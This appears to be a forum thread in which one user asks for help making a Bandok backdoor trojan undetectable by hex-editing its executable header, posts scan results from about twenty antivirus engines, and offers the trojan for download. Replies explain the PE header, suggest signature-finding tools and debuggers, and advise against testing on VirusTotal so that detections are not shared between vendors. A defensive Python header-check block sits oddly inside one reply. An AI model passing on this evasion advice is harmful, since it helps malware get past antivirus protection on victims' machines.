
Thread: Hex undetecting a trojan

  1. #1
    Join Date
    Mar 2008
    Posts
    1


    Hey guys, I just spent the last 2 hours trying to make this trojan undetectable by a few AVs. I got it to be undetected, but the program no longer runs (figures, eh). The problem is part of the hex I edited:
    [4D5A *000 0*00 0000 0400 0000 FFFF 0000]
    Here is what happens if I leave the hex as it is...
    Code:
    A-Squared              Found nothing
    AntiVir                Found HEUR/Malware
    ArcaVir                Found nothing
    Avast                  Found nothing
    AVG Antivirus          Found BackDoor.Bandok.B
    BitDefender            Found Backdoor.Bandok.AV
    ClamAV                 Found Trojan.Bandok-7
    CPsecure               Found BackDoor.W32.Bandok.av
    Dr.Web                 Found BackDoor.Iam
    F-Prot Antivirus       Found W32/Warezov.gen*!W32DL
    F-Secure Anti-Virus    Found Backdoor.Win32.Bandok.av
    Fortinet               Found W32/Bandok.AW!tr.bdr
    Ikarus                 Found Backdoor.Win32.Bandok.av
    Kaspersky Anti-Virus   Found Backdoor.Win32.Bandok.av
    NOD32                  Found probably a variant of Win32/Bandok (probable variant)
    Norman Virus Control   Found W32/Bandok.gen*
    Panda Antivirus        Found nothing
    Rising Antivirus       Found Backdoor.Agent.hfl
    Sophos Antivirus       Found Mal/Bandook-A
    VirusBuster            Found Backdoor.Bandok.BE
    VBA32                  Found BackDoor.Iam
    And obviously, when I removed the bolded part it becomes undetected by AVs.

    If you'd like to give it a shot I'd be grateful. I don't plan on using this; I put in a fake server and am just doing it for learning purposes.
    Here is a link to the file as I currently have it in the 'undetected' state. Change the first line to the above to have it detected but runnable.

    WARNING: The following download IS a trojan. Although it doesn't work or install the server, it is still a trojan. I'm giving you fair warning, although I'd appreciate it if you helped... If you run it, it'll install to Windows/System32/ali.exe


  2. #2
    Join Date
    Dec 2007
    Posts
    141
    What you modified is the DOS stub of the .exe. So all executables have what you just modified. If you learn the basic executable file structure you would be able to modify the hex much more easily and with far fewer errors. The byte you changed is specifically an executable signature telling the OS (Windows): hey, you need to execute this when opened.

    You should not edit anything in any of the headers, because that is what is used by Windows to execute the file. It has nothing to do with malware avoiding detection in most cases. Also, you have to think: if I were to create signatures for a virus database, I would base the signature on things the virus/trojan cannot change or it will not run. So code needed to run the malware could be a signature and may not be able to be changed; that's why most malware is packed in some way.

    Anyway, if you're still interested in this, try SignatureZero. It will help you a lot; just google for it. You should also have a debugger like Olly, IDA, W32Dasm, etc., so that you can see if what you're changing is important. Hope this info helps you.
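    The header bytes post #2 describes can be checked mechanically. As an added example (not code from this thread or from any tool named in it), a small Python check that validates the two signatures the Windows loader looks at first, the "MZ" e_magic at offset 0 and the "PE\0\0" signature at the offset stored in e_lfanew (0x3C); a file that fails it will not run, which is also a useful triage signal for a binary whose header has been hand-edited. The minimal header bytes it runs on are constructed here, not taken from the thread.

```python
import struct

# Offsets inside the 64-byte IMAGE_DOS_HEADER (the block the OP edited).
DOS_HEADER_SIZE = 0x40
E_MAGIC_OFFSET = 0x00      # "MZ"
E_LFANEW_OFFSET = 0x3C     # file offset of the "PE\0\0" signature
DOS_MAGIC = b"MZ"
PE_SIGNATURE = b"PE\0\0"


def check_pe_headers(data: bytes) -> list:
    """Return a list of problems with the DOS header and PE signature.

    An empty list means the two signatures the Windows loader checks first
    are intact. Anything else is a file the loader will reject, and a
    triage signal that the header has been damaged or hand-edited.
    """
    problems = []
    if len(data) < DOS_HEADER_SIZE:
        return ["shorter than the 64-byte DOS header"]
    magic = data[E_MAGIC_OFFSET:E_MAGIC_OFFSET + 2]
    if magic != DOS_MAGIC:
        problems.append(f"e_magic is {magic!r}, expected b'MZ'")
    e_lfanew = struct.unpack_from("<I", data, E_LFANEW_OFFSET)[0]
    if e_lfanew < DOS_HEADER_SIZE or e_lfanew + 4 > len(data):
        problems.append(f"e_lfanew 0x{e_lfanew:x} points outside the file")
    elif data[e_lfanew:e_lfanew + 4] != PE_SIGNATURE:
        problems.append(f"no PE signature at e_lfanew 0x{e_lfanew:x}")
    return problems


def build_minimal_header(magic: bytes = DOS_MAGIC) -> bytes:
    """Constructed sample: a DOS header followed directly by the PE
    signature. No code, only the two signatures the check above reads."""
    dos = bytearray(DOS_HEADER_SIZE)
    dos[E_MAGIC_OFFSET:E_MAGIC_OFFSET + 2] = magic
    struct.pack_into("<I", dos, E_LFANEW_OFFSET, DOS_HEADER_SIZE)
    return bytes(dos) + PE_SIGNATURE


if __name__ == "__main__":
    intact = build_minimal_header()
    # The same header with the "MZ" bytes overwritten, like the OP's edit.
    tampered = build_minimal_header(magic=b"\x00\x00")
    print("intact:  ", check_pe_headers(intact) or "OK")
    print("tampered:", check_pe_headers(tampered))
```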

  3. #3
    Join Date
    Apr 2007
    Posts
    922
    Also, don't test your server at Jotti or VirusTotal. If it is detected by just one scanner, the detected strings are given to all of the others, and your server will be detected by all very soon.
